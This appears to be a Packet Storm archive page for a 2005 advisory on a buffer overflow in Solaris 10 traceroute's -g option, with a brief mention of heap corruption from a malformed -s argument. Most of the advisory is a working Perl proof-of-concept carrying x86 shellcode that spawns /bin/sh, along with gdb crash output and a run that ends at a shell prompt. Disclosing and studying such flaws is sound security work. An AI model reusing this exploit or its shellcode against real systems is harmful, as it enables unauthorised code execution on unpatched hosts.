what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

traceSolaris.txt

traceSolaris.txt
Posted Jun 25, 2005
Authored by Venglin | Site frasunek.com

traceroute under Solaris 10 is susceptible to a buffer overflow in the handling of the -g argument. Sample exploitation included.

tags | exploit, overflow
systems | solaris
SHA-256 | cb0c0dbe8ee0f3edaaa0aa00d00ef0112897f0cc43532ced7b96994aa211b0bb

traceSolaris.txt

Change Mirror Download
/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in
handling -g argument. After supplying 10 -g parameters, return address is
overwritten by IP address argument:

atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g
7 -g 8 -g 9 -g 10 127.0.0.1
traceroute: too many IPv4 gateways
traceroute: unknown IPv4 host 1
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
Segmentation fault (core dumped)

atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7
-g 8 -g 9 -g 10 127.0.0'.
Program terminated with signal 11, Segmentation fault.
[...]
#0 0x0100007f in ?? ()

0x0100007f is of course 127.0.0.1.

It is possible to run arbitrary code, but because of using __init_suid_priv(),
impact is limited to raw socket access.

It is interesting, that this vulnerability is specific to Solaris 10. It doesn't
affect Solaris 8 or 9, nor the OpenSolaris.

Proof of concept code:

#!/usr/bin/perl

$ret = 0x8046bb0; # heap, solaris on amd64

$shellcode = "A" x 5000 .
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &
0xff0000) >> 16, ($ret & 0xff000000) >> 24);

$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8
-g 9 -g 10 $ip";

print $cmd, "\n";

system($cmd);



atari:venglin:~> perl ./trace.pl
traceroute: too many IPv4 gateways
traceroute: unknown IPv4 host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[...]
traceroute to 176.107.4.8 (176.107.4.8), 30 hops max, 88 byte packets
$


Another vulnerability is heap corruption after malformed -s argument:

atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
#0 0xfee7178d in _free_unlocked ()
from /lib/libc.so.1
(gdb) bt
#0 0xfee7178d in _free_unlocked () from /lib/libc.so.1
#1 0xfee71752 in free () from /lib/libc.so.1
#2 0xfefa49a6 in freeaddrinfo () from /lib/libsocket.so.1
#3 0x08052a7a in main ()


--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close